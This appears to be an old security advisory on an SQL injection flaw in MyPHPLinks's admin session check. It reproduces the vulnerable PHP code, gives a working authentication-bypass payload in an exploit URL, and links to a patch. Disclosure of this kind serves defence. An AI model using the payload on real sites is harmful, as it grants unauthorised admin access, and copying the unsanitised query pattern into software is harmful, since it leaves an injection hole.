Informations :
°°°°°°°°°°°°°°
Website : http://www.myphpsoft.net
Version : ? -> 2.1.9, 2.2.0CVS
Problem : SQL Injection -> Admin access
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin/auth/checksession.php
---------------------------------------------------------------
[...]
if($idsession!=''){
$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass);
if(!$dbs->connect())
die($dbs->error);
if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()"))
die($dbs->error);
while($dbs->nextrecord()){
$loginauth = $dbs->valeur("nb");
}
if ($loginauth==0){
header("Location:$MyPHPLinksAuthPErrDef");exit;
}else{
if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
die($dbs->error);
}
}else{
header("Location:$MyPHPLinksAuthPErrDef");exit;
}
?>
---------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/admin/index.php?idsession='%20OR%20''='
Patch :
°°°°°°°
A patch can be downloaded on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m .
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
